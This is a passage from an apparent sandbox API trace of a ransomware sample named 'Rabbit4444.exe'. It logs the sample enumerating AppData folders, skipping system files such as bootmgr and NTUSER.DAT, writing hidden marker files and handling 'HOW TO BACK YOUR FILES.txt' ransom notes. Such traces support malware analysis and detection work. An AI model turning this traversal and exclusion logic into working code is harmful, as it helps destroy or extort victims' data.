hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179f2f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.192] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.192] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.192] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.192] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.192] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.193] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.193] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.193] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.193] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.193] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0064.193] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.194] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.194] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.194] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.194] CloseHandle (hObject=0x2a0) returned 1 [0064.194] CloseHandle (hObject=0x2cc) returned 1 [0064.194] GetCurrentThreadId () returned 0xd98 [0064.194] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0064.194] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData" [0064.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124530 | out: hHeap=0xe0000) returned 1 [0064.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0064.194] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData" [0064.194] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\" [0064.194] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0064.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.198] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.200] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.201] CloseHandle (hObject=0x2cc) returned 1 [0064.202] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData") returned 84 [0064.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.202] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179ebc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0064.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.202] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.202] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.202] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.202] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179ebc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef94e792, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.202] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.202] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.202] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.202] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.202] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.202] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef975488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.202] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.203] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.203] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef94e792, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef94e792, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef975488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.203] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0064.203] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.203] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.203] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.204] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.204] CloseHandle (hObject=0x2a0) returned 1 [0064.204] CloseHandle (hObject=0x2cc) returned 1 [0064.204] GetCurrentThreadId () returned 0xd98 [0064.204] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0064.204] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC" [0064.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121860 | out: hHeap=0xe0000) returned 1 [0064.204] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0064.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC" [0064.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\" [0064.204] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0064.204] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.207] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.210] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.210] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.211] CloseHandle (hObject=0x2cc) returned 1 [0064.211] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC") returned 79 [0064.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x382acb94, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef975488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0064.211] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.211] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.211] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.211] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.211] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x382acb94, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef975488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.211] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.212] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.212] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.212] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.212] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.212] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef975488, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef975488, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef975488, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.212] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.212] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.212] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179cdce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19ce8eec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.212] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.212] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.212] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0064.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x123080 [0064.213] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x122168 [0064.213] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179d576, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19ce8eec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.213] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.213] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.213] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0064.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123380 [0064.214] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122348 [0064.214] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179dc05, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19ce8eec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0064.214] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0064.214] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0064.214] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0064.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0064.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123200 [0064.214] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1221a8 [0064.214] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179e373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19ce8eec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0064.214] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0064.215] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0064.215] lstrcpyW (in: lpString1=0x130ebd8, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0064.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0064.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124758 [0064.215] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1222c8 [0064.215] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179e373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x19ce8eec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0064.215] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0064.215] lstrcpyW (in: lpString1=0x130ebd8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.215] CreateFileW 